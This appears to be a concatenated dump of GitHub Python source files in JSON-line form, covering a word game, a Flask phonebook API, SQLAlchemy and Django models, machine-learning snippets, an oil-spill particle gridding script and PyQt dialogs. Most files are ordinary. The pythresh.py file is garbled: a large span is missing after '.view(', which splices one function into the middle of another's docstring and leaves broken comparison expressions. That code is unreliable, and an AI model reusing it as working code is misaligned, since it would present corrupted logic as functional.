len(word)>len(L[1]):\n\n print(\"Guess a longest word:{}\".format(word))\n print(\"You found a word from list.\")\n print(\"You won 30 pts\")\n\n elif len(L[0])>len(word) and len(L[1])>len(word) :\n\n print(\"Guess a longest word:{}\".format(word))\n print(\"You found a shortest word from list.\")\n print(\"You won 10 pts\")\n return word\n\n\nif len(sys.argv)== 4:\n print(word_game(sys.argv[1],sys.argv[2],sys.argv[3]))\n\nelse :\n sys.stderr.write(\"Please enter 3 words.\")\n sys.stderr.flush()\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"b021527434/Assignment2-b21527434","sub_path":"Assignment2.py","file_name":"Assignment2.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17768390129","text":"from flask import Flask, render_template, request, redirect\nfrom flask_restx import Resource, Api, fields\nfrom database.models import db, Contact\nimport settings\nfrom datetime import datetime, date\nimport api.parsers as parsers\n\napp = Flask(__name__)\napi = Api(app, title='Phonebook API', description='A RESTful Web API for my Phonebook Android app', prefix='/api', doc='/api/')\nns = api.namespace('Contact', description='Operations related to contacts')\n\n# configure database\napp.config['SQLALCHEMY_DATABASE_URI'] = settings.SQLALCHEMY_DATABASE_URI\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = settings.SQLALCHEMY_TRACK_MODIFICATIONS\ndb.init_app(app)\n\n# models\ncontact_model = api.model('Contact', {\n 'id': fields.Integer(readonly=True, description=\"The contact's unique identifier\"),\n 'name': fields.String(required=True, min_length=1, description=\"The contact's name\"),\n 'email': fields.String(description=\"The contact's email address\"),\n 'phone': fields.String(description=\"The contact's phone number\"),\n 'dob': fields.Date(description=\"The contact's date of 
birth\")\n})\n\ndef marshal(contact):\n return api.marshal(contact, contact_model)\n\n@app.route('/')\ndef home():\n return redirect('/api/')\n\n@app.route('/test')\ndef test():\n contacts = Contact.query.all()\n return render_template('test.html', contacts=contacts)\n\n@ns.route('/')\nclass ContactApi(Resource):\n @api.marshal_list_with(contact_model)\n @api.expect(parsers.date_range)\n def get(self):\n \"\"\"\n Returns list of phonebook contacts.\n \"\"\"\n args = parsers.date_range.parse_args(request)\n query = Contact.query\n\n timestamp = args['from']\n if timestamp:\n dt = datetime.fromtimestamp(timestamp)\n query = query.filter(Contact.updated_at > dt)\n \n timestamp = args['to']\n if timestamp:\n dt = datetime.fromtimestamp(timestamp)\n query = query.filter(Contact.updated_at < dt)\n\n return query.all()\n \n @api.response(201, 'Contact successfully created', contact_model)\n @api.response(400, 'Contact name cannot be empty')\n @api.expect(contact_model)\n def post(self):\n \"\"\"\n Creates a new phonebook contact.\n \"\"\"\n args = parsers.new_contact.parse_args(request)\n if not args['name']:\n return {'errors': {'name': 'Non-empty string required'}}, 400\n contact = Contact(**args)\n db.session.add(contact)\n db.session.commit()\n return marshal(contact), 201\n\n@ns.route('/')\n@api.response(404, 'Contact not found')\nclass SingleContactApi(Resource):\n @api.response(200, 'Success.', contact_model)\n def get(self, id):\n \"\"\"\n Returns a phonebook contact.\n \"\"\"\n contact = Contact.query.get(id)\n if not contact:\n return {'errors': {'id': 'No contact with this id'}}, 404\n return marshal(contact)\n\n @api.response(204, 'Contact successfully updated') \n @api.response(400, 'Request contains an error')\n @api.expect(contact_model)\n def put(self, id):\n \"\"\"\n Updates a phonebook contact.\n \"\"\"\n args = parsers.existing_contact.parse_args(request)\n if args['id'] != id:\n return {'errors': {'id': 'Does not match path id'}}, 400\n if not args['name']:\n return {'errors': {'name': 'Non-empty string required'}}, 400\n contact = Contact.query.get(id)\n if not contact:\n return {'errors': {'id': 'No contact with this id'}}, 404\n contact.name = args['name']\n contact.email = args['email']\n contact.phone = args['phone']\n contact.dob = args['dob']\n db.session.commit()\n return None, 204\n\n @api.response(200, 'Contact successfully deleted', contact_model)\n def delete(self, id):\n \"\"\"\n Deletes a phonebook contact.\n \"\"\"\n contact = Contact.query.get(id)\n if not contact:\n return {'errors': {'id': 'No contact with this id'}}, 404\n db.session.delete(contact)\n db.session.commit()\n return marshal(contact), 200\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"achen22/phonebook-api","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"964498128","text":"from sqlalchemy import create_engine, Column, Integer, String, ForeignKey\nfrom sqlalchemy.orm import sessionmaker, relationship\nfrom sqlalchemy.ext.declarative import declarative_base\n\n# создание базы данных в памяти\nengine = create_engine('sqlite:///:memory:', echo=True)\n\nBase = declarative_base()\n\n# определение модели Читатель\nclass Reader(Base):\n __tablename__ = 'reader'\n\n id = Column(Integer, primary_key=True)\n name = Column(String)\n books = relationship('Book')\n\n# определение модели Книга\nclass Book(Base):\n __tablename__ = 'book'\n\n id = 
Column(Integer, primary_key=True)\n title = Column(String)\n author = Column(String)\n reader_id = Column(Integer, ForeignKey('reader.id'))\n\n# создание таблиц\nBase.metadata.create_all(engine)\n\n# создание сессии для работы с базой данных\nSession = sessionmaker(bind=engine)\nsession = Session()\n\n# добавление данных в таблицы\nreader1 = Reader(name='Анна')\nreader2 = Reader(name='Иван')\n\nbook1 = Book(title='Мастер и Маргарита', author='Михаил Булгаков', reader_id=reader1.id)\nbook2 = Book(title='Преступление и наказание', author='Федор Достоевский', reader_id=reader1.id)\nbook3 = Book(title='Братья Карамазовы', author='Федор Достоевский', reader_id=reader2.id)\n\nsession.add_all([reader1, reader2, book1, book2, book3])\nsession.commit()\n\n\n# функция для вывода всех книг для введенного с клавиатуры читателя\ndef get_books_by_reader_id(reader_id):\n reader = session.query(Reader).filter_by(id=reader_id).first()\n if reader is None:\n print(f'Читатель с id={reader_id} не найден')\n else:\n books = reader.books\n for book in books:\n print(f'\"{book.title}\" by {book.author}')\n\nget_books_by_reader_id(1) # вывод всех книг для читателя с id=1\n# \"Мастер и Маргарита\" by Михаил Булгаков\n# \"Преступление и наказание\" by Федор Достоевский\n","repo_name":"chipolitta/python","sub_path":"BDrelationship/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70776199209","text":"import torch\nimport torch.nn as nn\n\nclass PositionalEncoder(nn.Module):\n \"\"\"\n This torch Module define the positional encoding strategy as described in the NeRF official paper\n \"\"\"\n def __init__(self,L):\n super(PositionalEncoder, self).__init__()\n self.L = L\n self.freqs = torch.linspace(2**0,2**(L-1),L)\n self.encoding_functions = []\n\n for freq in self.freqs:\n self.encoding_functions.append(lambda x: torch.cos(freq*torch.pi*x))\n self.encoding_functions.append(lambda x: torch.sin(freq*torch.pi*x))\n\n def forward(self,x):\n #Apply positional encoding to the input x -> [cos(2**0*pi*x),sin(2**0*pi*x),...,cos(2**(L-1)*pi*x),sin(2**(L-1)*pi*x)]\n return torch.cat([encoding_function(x) for encoding_function in self.encoding_functions],dim=-1)\n","repo_name":"davidemiro/NeRF-pytorch","sub_path":"nerf/encoding.py","file_name":"encoding.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36343146857","text":"from math import log10, floor\nimport numpy as np\nimport pprint\npp = pprint.PrettyPrinter(indent=12)\n\n# Round to 3 s.f.\ndef sf3(x):\n if x and isinstance(x, (int, float, complex)) and not isinstance(x, bool):\n return round(x, -int(floor(log10(abs(x)))) + 2)\n else:\n return x\n\ndef fieldMinMax(dataTypeDict, fieldName):\n if fieldName in dataTypeDict:\n field = dataTypeDict[fieldName]\n if type(field) == np.ndarray:\n if field.shape[0] > 1:\n # Handle 2D arrays, e.g. 
an array containing x, y, z in columns\n try:\n if len(field.shape) > 1:\n for dim1Idx in range(field.shape[1]):\n print(' ', \n sf3(np.min(field[:, dim1Idx])), \n ' >= ', fieldName, ' - col ', dim1Idx, \n ' >= ', sf3(np.max(field[:, dim1Idx])))\n else:\n print(' ', \n sf3(np.min(field)), \n ' >= ', fieldName,\n ' >= ', sf3(np.max(field)))\n except ValueError:\n print(' ', fieldName, ' contains data error!') \n\ndef info(containers, **kwargs):\n if not isinstance(containers, list):\n containers = [containers]\n for container in containers:\n pp.pprint(container['info'])\n for channelName in container['data']:\n print(' Channel: ' + channelName)\n for dataType in container['data'][channelName]:\n print(' DataType: ' + dataType)\n dataTypeDict = container['data'][channelName][dataType]\n if 'ts' in dataTypeDict:\n print(' Num events: ', len(dataTypeDict['ts']))\n fieldMinMax(dataTypeDict, 'ts')\n if 'tsOffset' in dataTypeDict:\n print(' Ts offset: ', dataTypeDict['tsOffset'])\n for fieldName in dataTypeDict.keys():\n if fieldName not in ['ts', 'tsOffset']:\n fieldMinMax(dataTypeDict, fieldName)\n else:\n pp.pprint(dataTypeDict)\n print()\n print()\ndef infoTs(containers, **kwargs):\n if not isinstance(containers, list):\n containers = [containers]\n for container in containers:\n print(container['info'])\n for channelName in container['data']:\n print(' Channel: ' + channelName)\n for dataType in container['data'][channelName]:\n print(' DataType: ' + dataType)\n dataTypeDict = container['data'][channelName][dataType]\n if 'ts' in dataTypeDict:\n fieldMinMax(dataTypeDict, 'ts')\n if 'tsOffset' in dataTypeDict:\n print(' Ts offset: ', dataTypeDict['tsOffset'])\n\n#%% Legacy function names\n\ndef dict_keys_print(d, indent):\n print(' ' * (4 * indent - 2) + '{ ', end='')\n first = True\n for key, value in d.items():\n if first:\n print(str(key), end='')\n first = False\n else:\n print(' ' * 4 * indent + str(key), end='')\n if isinstance(value, dict):\n print(':')\n dict_keys_print(value, indent + 1)\n else:\n print(',')\n continue\n print(' ' * (4 * indent - 2) + '}')\n\ndef infoForImportedDicts(container, **kwargs):\n info(container, **kwargs)\n\ndef infoTsForImportedDicts(container, **kwargs):\n infoTs(container, **kwargs)","repo_name":"event-driven-robotics/bimvee","sub_path":"bimvee/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":3714,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"71567507368","text":"# -*- coding: utf-8 -*-\n\"\"\"\nModule: build_particle_array.py\nCreated on Sat Oct 19 15:34:52 2013\n@author: gav\nDescription:\n\n\"\"\"\n### Imports\nfrom __future__ import print_function\n\nimport os, sys\nimport time\n\nimport os.path as osp\nimport numpy as np\nimport numpy.ma as ma\nimport pickle\n\nfrom numpy import array, newaxis\nimport scipy.sparse as sp\nimport matplotlib.pyplot as plt\n\n\nfrom pyproj import Proj\nfrom shapely.geometry import Polygon\n#\n#import bonaparte\n#import bonaparte.stoch.stoch_lib as sl\n#from bonaparte.utils.grid_cell_areas import grid_cell_areas\n\n### Logging\nimport logging\nlogging.basicConfig(level=logging.DEBUG)\ndebug, info, warn, error = logging.debug, logging.info, logging.warn, logging.error\n### Constants\n\nSOUTHERN_HEMISPHERE = True\n\nSURFACE_TYPE = 0\nAROMATIC_TYPE = -1\nENTRAINED_TYPE = -2\nSURFACTANT_TYPE = -3\n\nTR3_RECORD_SIZE = 40\nEMPTY_HEADER_LINES = 7\n\n### Classes\n\n### Functions\n\n### Grid cell area module\ndef 
grid_cell_areas(_grid_header=None, grid_fp=None):\n \"\"\"\n Return an array of the areas of a column of grid cells\n \"\"\"\n assert bool(_grid_header) != osp.isfile(grid_fp or \"\")\n _gh = _grid_header or grid_header(grid_fp)\n points_array = grid_column_verts(_gh)\n utm_points_array = reproject(points_array)\n area_array = polygon_areas(utm_points_array)\n return area_array\n\ndef grid_column_verts(_grid_header=None, grid_fp=None):\n \"\"\"\n Given a grid, return an array of the corners of a column of the grid\n Which column is unimportant as all will have the same set of areas.\n\n The array will have dimensions\n n_rows, that is the length of the column\n n_points, that is 5, the number to specify a rectangle\n n_geo_dims, that is 2 lat,lon\n\n eg\n [[(ax1, ay1), (ax2, ay2), (ax3, ay3), (ax4, ay4), (ax5, ay5)],\n [(bx1, by1),.. (bx5, by5)],]\n\n Fastest way to fill numpy array\n http://stackoverflow.com/questions/5891410/numpy-array-initialization-fill-with-identical-values?lq=1\n \"\"\"\n # Ensure grid_header xor grid_fp exist\n assert bool(_grid_header) != osp.isfile(grid_fp or \"\")\n _gh = _grid_header or grid_header(grid_fp)\n n_rows = _gh['n_rows']\n dy = float(_gh['lon_delta'])\n lon_0 = float(_gh['lon_lower_left'])\n lat_0 = float(_gh['lat_lower_left'])\n\n # Make me a function to generate vertices\n vertices = verts_factory(_gh)\n # Need a sequence of lower left points\n verts_array = np.empty(shape=(n_rows, 5, 2))\n ll_corners = np.empty(shape=(n_rows, 2)) # lower left corners (lon, lat)\n ll_corners[:,0] = lon_0\n ll_corners[:,1] = np.linspace(lat_0, lat_0 + n_rows * dy, n_rows)\n verts_array[:] = np.array(map(vertices, ll_corners))\n return verts_array\n\ndef polygon_areas(arr):\n \"\"\"\n Given an column of points, return a column of polygon areas\n \"\"\"\n ps = map(Polygon, arr)\n areas = [p.area for p in ps]\n return np.array(areas)\n\ndef reproject(arr, zone=None):\n \"\"\"Given an aray of points, return the utm coordinates\"\"\"\n new_arr = np.empty_like(arr)\n _zone = zone or utm_zone(None)\n proj = Proj(proj=\"utm\", zone=_zone, ellps=\"WGS84\")\n for i, grid_cell in enumerate(arr):\n for j, point in enumerate(grid_cell):\n new_arr[i, j, :] = np.array(proj(*point))\n return new_arr\n\ndef utm_zone(point):\n \"\"\"\n *** Warning stub only - fixed output\n Given a geographical point, return the appropriate utm zone\n\n Args:\n point - array of shape (1, 2) ie (lon, lat)\n\n Returns:\n zone - string of the form \"50L\"\n\n \"\"\"\n warn(\"***Warning stub function - fixed return value***\")\n return \"50L\"\n\ndef verts_factory(grid_header):\n \"\"\"\n Return a function that will calculate the five verts given the lower left corner\n \"\"\"\n dx = np.array([float(grid_header['lon_delta']), 0])\n dy = np.array([0, float(grid_header['lat_delta'])])\n\n def verts(point):\n _verts = np.empty((5,2))\n _verts[0] = point\n _verts[1] = point + dx\n _verts[2] = point + dx + dy\n _verts[3] = point + dy\n _verts[4] = point\n return _verts\n\n return verts\n\n###\n### Stoch_lib module ###\n\n\ndef gridder_arr_factory(grid_fp=None,\n grid_ext=None,\n grid_spc=None):\n \"\"\"Return a function to convert lon, lat to row, col\n\n Args of factory:\n grid_fp - String of the full path to a APASA .dep grid file\n grid_extent - a dictionary of the upper right and lower left corners\n see stoch_lib.grid_extent\n grid_spacing_arr - array of lon_delta and lat_delta\n see stoch.lib.grid_spacing\n \"\"\"\n err_msg = \"Incomplete args. 
see \\n {}\".format(gridder_arr_factory.__doc__)\n assert grid_fp or (grid_extent and grid_spacing), err_msg\n\n if grid_fp is not None:\n assert osp.isfile(grid_fp), \"{} is not a file\".format(grid_fp)\n if grid_ext is None:\n grid_ext = grid_extent(grid_fp)\n if grid_spc is None:\n grid_spc = grid_spacing_arr(grid_fp)\n\n origin = np.array(grid_ext['upper_left'])\n print(\"origin is {}\".format(origin))\n delta = np.array(grid_spc).view(' gen = particles_and_shore_generator(tr3_fp, lu3_fp, grid_fp)\n > for time, surf, entr, arom , shore in gen:\n > ...\n\n Yields (time, surf_p, entr_p, arom_p, shore_c)\n \"\"\"\n def log(log_msg): debug(\"particle_and_shore_generator: {}\".format(log_msg))\n if __debug__:\n log(\"TR3 file is {}\".format(tr3_fp))\n log(\"LU3 file is {}\".format(lu3_fp))\n log(\"Grid file is {}\".format(grid_fp))\n\n\n grid_record = grid_extent(grid_fp)\n lower_lon, upper_lat = grid_record['upper_left']\n upper_lon, lower_lat = grid_record['lower_right']\n\n lu3_arr = lu3_data(lu3_fp)\n particle_names_ls = ['lon', 'lat', 'radius', 'prev_lon', 'prev_lat',\n 'type', 'mass', 'density', 'viscosity', 'age']\n particle_formats_ls = [' lower_lon),\n np.array(particles['lon'] < upper_lon))\n lat_mask = np_and(np.array(particles['lat'] > lower_lat),\n np.array(particles['lat'] < upper_lat))\n bounds_mask = np_and(lon_mask, lat_mask)\n surf_p = particles[np_and(bounds_mask, surf_mask)]\n entr_p = particles[np_and(bounds_mask, entr_mask)]\n arom_p = particles[np_and(bounds_mask, arom_mask)]\n yield (row['time'], surf_p, entr_p, arom_p, shore_cells)\n\n return inner()\n\ndef main():\n \"\"\"\n Main func\n \"\"\"\n project_dir = r\"J:\\data\\j0267_nv_remodel\"\n stem = \"J0267_SC3_SBED_LEAK_TRA_001\"\n grid_fn = \"VanGogh_800m.DEP\"\n h5_fn = \"j0267_data.h5\"\n\n tr3_fp = osp.join(project_dir, \"modelout\", stem + \".tr3\" )\n lu3_fp = osp.join(project_dir, \"modelout\", stem + \".lu3\" )\n grid_fp = osp.join(project_dir, \"grids\", grid_fn)\n\n surf_threshold = 1e-6 # T/m2 or 1 g/m2\n\n header = grid_header(grid_fp)\n grid_shape = (header['n_rows'], header['n_cols'])\n\n particles = particles_and_shore_generator(tr3_fp, lu3_fp, grid_fp)\n gridder = gridder_arr_factory(grid_fp)\n\n start_time = time.time()\n max_surf_mass = np.zeros(grid_shape, dtype=np.float32)\n\n for i, tup in enumerate(particles):\n sim_time, surf, entr, arom, shore = tup\n surf_dense = grid_mass_dense(surf, gridder, grid_shape)\n max_surf_mass = np.maximum(max_surf_mass, surf_dense)\n\n # Now we need a threshold_matrix to find which cells have exceeded the threshold\n cell_areas = grid_cell_areas(grid_fp=grid_fp)\n # the mass threshold is the threshold * area eg 0.001 kg/m2 * 640000 m2 = mass in Ts\n mass_threshold_T = cell_areas * surf_threshold\n exceedance = max_surf_mass >= mass_threshold_T[:, np.newaxis]\n max_mass = ma.array(max_surf_mass, mask=(max_surf_mass == 0.0))\n elapsed_time = time.time() - start_time\n print(\"Finished {} timesteps in {} seconds\".format(i, elapsed_time))\n# plt.imshow(exceedance, origin=\"upper\", interpolation=\"nearest\")\n# plt.show()\n\n### Tests\n\nif __name__ == \"__main__\":\n\n main()\n\n\n print(\"Done __main__\")\n","repo_name":"gjcoombes/banks","sub_path":"banks/pythresh/pythresh.py","file_name":"pythresh.py","file_ext":"py","file_size_in_byte":13246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27028871218","text":"\r\nfrom asyncio import constants\r\nimport json\r\nfrom flask import Flask, redirect, 
url_for, request,render_template,Request,jsonify,make_response\r\napp = Flask(__name__)\r\n\r\n\r\n@app.route('/biz', methods=[ 'GET'])\r\ndef business():\r\n\tif request.method == 'GET':\r\n\t\tkeyword = request.args.get('keyw')\r\n\t\tnewresp = {\r\n\t\t\t\"name\": \"John\",\r\n\t\t\t\"age\": 30,\r\n\t\t\t\"city\": \"New York\"\r\n\t\t\t}\r\n\t\tjsondata = json.dumps(newresp)\r\n\t\tprint(jsondata)\r\n\t\treturn render_template('biz.html',data = jsondata)\r\n\t\r\n\r\n\r\nif __name__ == '__main__':\r\n\tapp.run(debug=True)\r\n","repo_name":"Shreyavish/bizsample","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35748524941","text":"'''\nhttps://boj.kr/9012\n'''\nimport sys\ninput = sys.stdin.readline\n\nN = int(input())\n\nfor _ in range(N):\n parentheses = input().rstrip()\n counter = 0\n for parnthesis in parentheses:\n if parnthesis == '(':\n counter += 1\n else:\n counter -= 1\n if counter < 0:\n break\n if counter == 0:\n print(\"YES\")\n else:\n print(\"NO\")\n ","repo_name":"jihoonyou/problem-solving-2","sub_path":"boj/9012_괄호.py","file_name":"9012_괄호.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26879151192","text":"def card_converter(cards):\n dictionary = {\n 'A': 14,\n 'K': 13,\n 'Q': 12,\n 'J': 11 \n }\n\n converted_cards = []\n for card in cards:\n new_card_rank = dictionary.get(card['rank']) or int(card['rank'])\n converted_cards.append({\"rank\": new_card_rank, \"suit\": card['suit']})\n\n return converted_cards","repo_name":"porlov/poker-player-always-all-in","sub_path":"card_converter.py","file_name":"card_converter.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20080103498","text":"# Day_08_01_google.py\n\nimport pandas as pd\nimport nltk\nimport numpy as np\nimport tensorflow.keras as keras\nfrom sklearn import preprocessing, model_selection\nimport matplotlib.pyplot as plt\n\n\ndef get_xy():\n goog = pd.read_csv('data/GOOG.csv', index_col=0) # Date 를 인덱스로 한다. 이때 나중에 요일 관련된 정보를 추출할 수 있음\n print(goog) # [252 rows x 6 columns]\n\n values = [goog['Open'], goog['High'], goog['Low'], goog['Volume'], goog['Close']]\n values = np.transpose(values)\n print(values.shape) # (252, 5)\n\n # ------------------------- #\n\n scaler = preprocessing.MinMaxScaler() # 원래 주식가격을 시각화에 사용하기 위해서는 minmax를 쓰지 않고 MinMaxScaler를 사용함\n values = scaler.fit_transform(values) # 공부하고 변환까지 한번에 하는 함수\n # 앞쪽이 옛날 데이터이므로 values를 뒤집지는 않는다.\n\n grams = nltk.ngrams(values, 7+1)\n grams = np.float32(list(grams)) # 튜플의 리스트라 원하는 연산을 못함. 
넘파이로 바꿔줌\n\n x = np.float32([g[:-1] for g in grams]) # g는 8행 5열, 7행이어야해서 슬라이싱\n # print(x.shape) # (245, 7, 6)\n y = np.float32([g[-1, -1:] for g in grams])\n # print(y.shape) # (245, 1)\n\n return x, y, scaler.data_min_[-1], scaler.data_max_[-1]\n\n\ndef model_google():\n x, y, data_min, data_max = get_xy() # 최대 최소값을 이용, 계산해 원래의 값으로 복구시킨다\n\n data = model_selection.train_test_split(x, y, train_size=0.8, shuffle=False)\n x_train, x_test, y_train, y_test = data\n\n model = keras.Sequential()\n model.add(keras.layers.InputLayer(input_shape=x.shape[1:]))\n model.add(keras.layers.SimpleRNN(32, return_sequences=False))\n # hidden stage의 사이즈를 늘리거나 simplernn layer를 늘릴수록 정확도가 높아짐\n # return_sequences:true->입력한 값만큼,false->1개 # rnn은 x는 3차원 데이터가 들어옴. y는 2차원임\n\n model.add(keras.layers.Dense(1))\n # model.summary()\n\n model.compile(optimizer=keras.optimizers.Adam(0.001),\n loss=keras.losses.mse,\n metrics='acc') # mae는 정답과의 오차\n\n model.fit(x_train, y_train, epochs=100, verbose=2,\n validation_data=(x_test, y_test))\n print(model.evaluate(x_test, y_test, verbose=0))\n\n p = model.predict(x_test)\n\n plt.subplot(1, 2, 1)\n plt.plot(y_test, 'r', label='target') # 데이터를 섞어서 시각화가 제대로 되지 않음 # 셔플옵션 false로 주고오기\n plt.plot(p, 'g', label='prediction')\n plt.legend() # label 값을 표에 표시할수있다\n\n p = (data_max - data_min) * p + data_min\n # print((data_max-data_min)*p+data_min)\n y_test = (data_max - data_min) * y_test + data_min\n\n plt.subplot(1, 2, 2)\n plt.plot(y_test, 'r') # 데이터를 섞어서 시각화가 제대로 되지 않음 # 셔플옵션 false로 주고오기\n plt.plot(p, 'g')\n plt.ylim(2650, 3000)\n plt.show()\n\n\nmodel_google()\n\n","repo_name":"hmson18/cafe_WatingTime","sub_path":"Day_08_01_google.py","file_name":"Day_08_01_google.py","file_ext":"py","file_size_in_byte":3062,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14014484434","text":"from random import randint\r\nprint('='*35)\r\nprint('Eu pensei em um número de 0 a 10...')\r\nprint('='*35)\r\nnum = int(input('Em que número eu pensei? '))\r\ncomputador = randint(0,10)\r\ntentativa = 0\r\nwhile num != computador:\r\n num = int(input('\\033[31mOpção errada, tente novamente.\\033[m\\nEm que número eu pensei? 
'))\r\n tentativa += 1\r\nprint('Você acertou, mas precisou de {} tentativa(s).'.format(tentativa+1))","repo_name":"andreattamatheus/Jornada-Python-Cursoemvideo-Mundo2","sub_path":"Desafio #058.py","file_name":"Desafio #058.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73431678569","text":"from django.db import models\nfrom django.core.exceptions import ValidationError\n\n\n\n\nclass Operator(models.Model): \n\tfirst_name = models.CharField(max_length=10)\n\tlast_name = models.CharField(max_length=10)\n\n\n\t\n\n\tdef __str__(self):\n\t\treturn \"{} {}\".format(self.first_name, self.last_name) \n\n\n\tdef capitalize(self, word):\n\t\tif word[0].islower():\n\t\t\traise ValidationError('Please make first letter uppercase - {}'.format(word))\n\n\tdef validate_unique(self, exclude=None):\n\t\t\"\"\"\n\t\tcan also do this within Operator class \n\t\t\t# class Meta:\n\t\t\t# \tunique_together = ('first_name', 'last_name')\n\t\t\"\"\"\n\t\toperators = Operator.objects.all()\n\t\t# import pdb; pdb.set_trace()\n\t\tfor operator in operators:\n\t\t\tif operator.first_name == self.first_name and operator.last_name == self.last_name: \n\t\t\t\traise ValidationError('Combination of first & last name alreads exists in DB = {} {}'.format(operator.first_name, operator.last_name))\n\n\t\tself.capitalize(self.first_name)\n\t\tself.capitalize(self.last_name)\n\n\n\tdef save(self, *args, **kwargs): \n\t\t\"\"\"\n\t\tvalidate data before saving\n\t\t\"\"\"\n\t\tself.validate_unique()\n\t\treturn super(Operator, self).save(*args, **kwargs) \n\n\n\n\n\n\nclass Site(models.Model):\n\tlocation = models.CharField(max_length=5)\n\tcreated = models.DateTimeField(auto_now_add=True)\n\tupdated = models.DateTimeField(blank=True, null=True)\n\tdeleted = models.DateTimeField(blank=True, null=True)\n\toperator = models.ForeignKey(Operator, on_delete=models.CASCADE)\n\n\tdef __str__(self):\n\t\treturn self.location \n\n\n\nclass Computer(models.Model):\n\thostname = models.CharField(max_length=10, unique=True)\n\tbfid = models.CharField(max_length=20, unique=True)\n\tsite = models.ForeignKey(Site, on_delete=models.CASCADE)\n\tcreated = models.DateTimeField(auto_now_add=True)\n\tupdated = models.DateTimeField(blank=True, null=True)\n\tdeleted = models.DateTimeField(blank=True, null=True)\n\n\tdef __str__(self):\n\t\treturn self.hostname\n\n\n\n\n\n","repo_name":"FelicianoAnthony/filter-by-param","sub_path":"myapp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21487740511","text":"class Solution(object):\n def distnict(self, nums, k):\n dict = defaultdict(int)\n left = 0\n right = 0\n res = 0\n while right < len(nums):\n dict[nums[right]] += 1\n while len(dict) > k:\n dict[nums[left]] -= 1\n if dict[nums[left]] == 0:\n del dict[nums[left]]\n left += 1\n res += right - left + 1\n right += 1\n return res\n def subarraysWithKDistinct(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: int\n \"\"\"\n return self.distnict(nums, k) - self.distnict(nums, k - 1)\n","repo_name":"bontu-fufa/squid-game","sub_path":"subarraysWithKDistinct.py","file_name":"subarraysWithKDistinct.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36151732061","text":"import 
sys\nsys.path.append(\"..\")\nfrom naive_bayes import NaiveBayes\nfrom testing import loadData, splitData, extractColumn, getAccuracy\n\ndata = loadData('iris.data')\n\ntrainSet, testSet = splitData(data, 0.66)\n\ntrainY, trainX = extractColumn(trainSet, 'class')\ntestY, testX = extractColumn(testSet, 'class')\n\npredictions = NaiveBayes().fit(trainX, trainY).predict(testX)\n\naccuracy = getAccuracy(testY, predictions)\nprint('Accuracy: ' + repr(accuracy) + '%')","repo_name":"dan-silver/machine-learning-algorithms","sub_path":"examples/NaiveBayes.py","file_name":"NaiveBayes.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33712972825","text":"import sys\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\n\n\nclass MyWindow(QMainWindow):\n def __init__(self, parent=None):\n super(MyWindow, self).__init__(parent)\n self.setWindowTitle(\"弹出式对话框例子\")\n self.resize(400, 200)\n self.btn1 = QPushButton(self)\n self.btn1.setText(\"消息框\")\n self.btn1.clicked.connect(self.msg1)\n layout = QVBoxLayout()\n\n self.btn2 = QPushButton(self)\n self.btn2.setText(\"问答对话框\")\n self.btn2.clicked.connect(self.msg2)\n\n self.btn3 = QPushButton()\n self.btn3.setText(\"警告对话框\")\n self.btn3.clicked.connect(self.msg3)\n\n self.btn4 = QPushButton()\n self.btn4.setText(\"严重错误对话框\")\n self.btn4.clicked.connect(self.msg4)\n\n self.btn5 = QPushButton()\n self.btn5.setText(\"关于对话框\")\n self.btn5.clicked.connect(self.msg5)\n\n layout.addWidget(self.btn1)\n layout.addWidget(self.btn2)\n layout.addWidget(self.btn3)\n layout.addWidget(self.btn4)\n layout.addWidget(self.btn5)\n\n self.setLayout(layout)\n\n def msg1(self):\n # 使用infomation信息框\n relay = QMessageBox.information(self, \"车辆总数\", \"100\", QMessageBox.Yes | QMessageBox.No, QMessageBox.Yes)\n print(relay)\n\n def msg2(self):\n relay = QMessageBox.question(self, \"标题\", \"问答消息正文\", QMessageBox.Yes | QMessageBox.No, QMessageBox.Yes)\n print(relay)\n\n def msg3(self):\n QMessageBox.warning(self, \"标题\", \"警告消息正文\", QMessageBox.Yes | QMessageBox.No, QMessageBox.Yes)\n\n def msg4(self):\n QMessageBox.critical(self, \"标题\", \"严重错误消息正文\", QMessageBox.Yes | QMessageBox.No, QMessageBox.Yes)\n\n def msg5(self):\n QMessageBox.about(self, \"标题\", \"关于消息正文\")\n\n\nif 